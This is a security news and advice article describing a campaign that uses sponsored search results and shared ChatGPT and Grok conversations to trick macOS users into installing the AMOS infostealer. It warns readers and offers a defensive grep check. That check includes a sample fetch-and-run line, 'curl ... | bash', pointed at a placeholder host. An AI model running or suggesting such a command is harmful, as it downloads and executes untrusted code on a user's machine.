
Attackers Are Spreading Malware Through ChatGPT

You (hopefully) know by now that you can’t take everything AI tells you at face value. Large language models (LLMs) sometimes provide incorrect information, and threat actors are now using paid search ads on Google to surface shared ChatGPT and Grok conversations that appear to provide tech support instructions but actually direct macOS users to install infostealing malware on their devices.

The campaign is a variation on the ClickFix attack, which often uses CAPTCHA prompts or fake error messages to trick targets into executing malicious commands. But in this case, the instructions are disguised as helpful troubleshooting guides on legitimate AI platforms.

How attackers are using ChatGPT

Kaspersky details a campaign specific to installing Atlas for macOS. If a user searches “chatgpt atlas” to find a guide, the first sponsored result is a link to chatgpt.com with the page title “ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac.” If you click through, you’ll land on the official ChatGPT site and find a series of instructions for (supposedly) installing Atlas.

However, the page is a copy of a conversation between an anonymous user and the AI—which can be shared publicly—that is actually a malware installation guide. The chat directs you to copy, paste, and execute a command in your Mac’s Terminal and grant all permissions, which hands over access to the AMOS (Atomic macOS Stealer) infostealer.

A further investigation from Huntress showed similarly poisoned results via both ChatGPT and Grok using more general troubleshooting queries like “how to delete system data on Mac” and “clear disk space on macOS.”

AMOS targets macOS, gaining root-level privileges and allowing attackers to execute commands, log keystrokes, and deliver additional payloads. BleepingComputer notes that the infostealer also targets cryptocurrency wallets, browser data (including cookies, saved passwords, and autofill data), macOS Keychain data, and files on the filesystem.

Don’t trust every command AI generates

If you’re troubleshooting a tech issue, carefully vet any instructions you find online. Threat actors often use sponsored search results as well as social media platforms to spread instructions that are actually ClickFix attacks. Never follow guidance you don’t understand, and know that if a guide asks you to execute commands in PowerShell or Terminal to “fix” a problem, there’s a high likelihood that it’s malicious—even if it comes from a search engine or LLM you’ve used and trusted in the past.
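One practical habit that follows from this advice: before running any command a guide hands you, save it to a file and scan it for red-flag patterns instead of pasting it straight into Terminal. The sketch below is illustrative only—the filename, the simulated script, and the grep patterns are examples I've chosen, not an exhaustive malware detector:

```shell
# Illustrative sketch: a quick red-flag scan of a script you were told to run.
# The filename and patterns below are examples, not a complete detector.

# Simulate a "troubleshooting" command pasted from a shared AI conversation:
cat > suspect.sh <<'EOF'
echo "Freeing disk space..."
curl -s http://payload.example.com/fix | bash
EOF

# Flag patterns common in ClickFix-style commands: piping a download straight
# into a shell, decoding base64 blobs, or invoking osascript.
grep -nE 'curl[^|]*\|[[:space:]]*(ba|z)?sh|base64[[:space:]]+(-d|--decode)|osascript' suspect.sh
```

If the scan flags anything, or you simply don’t understand a line, don’t run it: a legitimate disk-cleanup guide has no reason to fetch and execute remote code.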

Of course, you can potentially turn the attack around by asking ChatGPT (in a new conversation) if the instructions are safe to follow. According to Kaspersky, the AI will tell you that they aren’t.

Source

ZaKi

